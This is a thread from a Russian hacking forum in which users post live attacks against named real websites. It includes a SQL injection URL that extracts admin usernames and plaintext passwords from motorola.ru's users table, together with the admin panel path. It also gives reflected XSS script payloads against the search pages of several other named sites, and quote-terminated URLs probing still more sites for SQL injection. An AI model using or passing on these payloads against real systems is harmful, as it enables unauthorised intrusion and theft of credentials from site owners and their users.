ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Motorola RU - неожидал

_http://www.motorola.ru/pcomm.php?id=33&action=hole&newsid=3122666+UNION+S ELECT+0,0,0,name,password,0,0,0,0,0,0,0,0,0,0+FROM +users/*

логин и пароль(в чистом виде) к админке:

_http://www.motorola.ru/admin/

да, но:
safe_mode: ON PHP version: 4.3.11 cURL: OFF MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
Disable functions : dl, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate, posix_mkfifo, set_time_limit

красивый дизайн у сайтов! =)

_http://www.cenmax.ru/search.html?q='><script>alert(/kaban/)</script>

_http://oriole.ru/search.html?q='><script>alert(/kaban/)</script>

_http://sentry.ru/search.html?q='><script>alert(/kaban/)</script>

_http://inspector-alarm.ru/search.html?q='><script>alert(/kaban/)</script>

_http://www.military-loan-savvy.com/military-personal-loans.html?source=yahoo&campaign - алерт в поисковике


_http://usmcshop.grunt.com/Grunt/ в поисковике алерт

_http://www.stepbystep.com.ua/rus/search/?query="><script>alert()</script>

Короче учитывая мнения многих юзеров, временно закрываю темку, до тех пор пока с модерами не обсудим.Многие правы, нефиг стоко пассив хсс выкладывать, вот чел выложил баг на мотороле, респект ему.
2dracula: а ты заипал со своими хсс-ками пассивными + каждый в отдельном посте...
ТЕМА ЗАКРЫТА ВРЕМЕННО.

__________________

Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze

Согласен довно хотел тоже сказать, эти ксс вообше сидят в горле, нужна обсудить и сделать так что бы были реальные баги , а не пасивные ксс.

http://www.mirt-service.ru/constructor.php?manufacturer=1'

http://mp3plus.ru/album.php?id=4796&art=1247'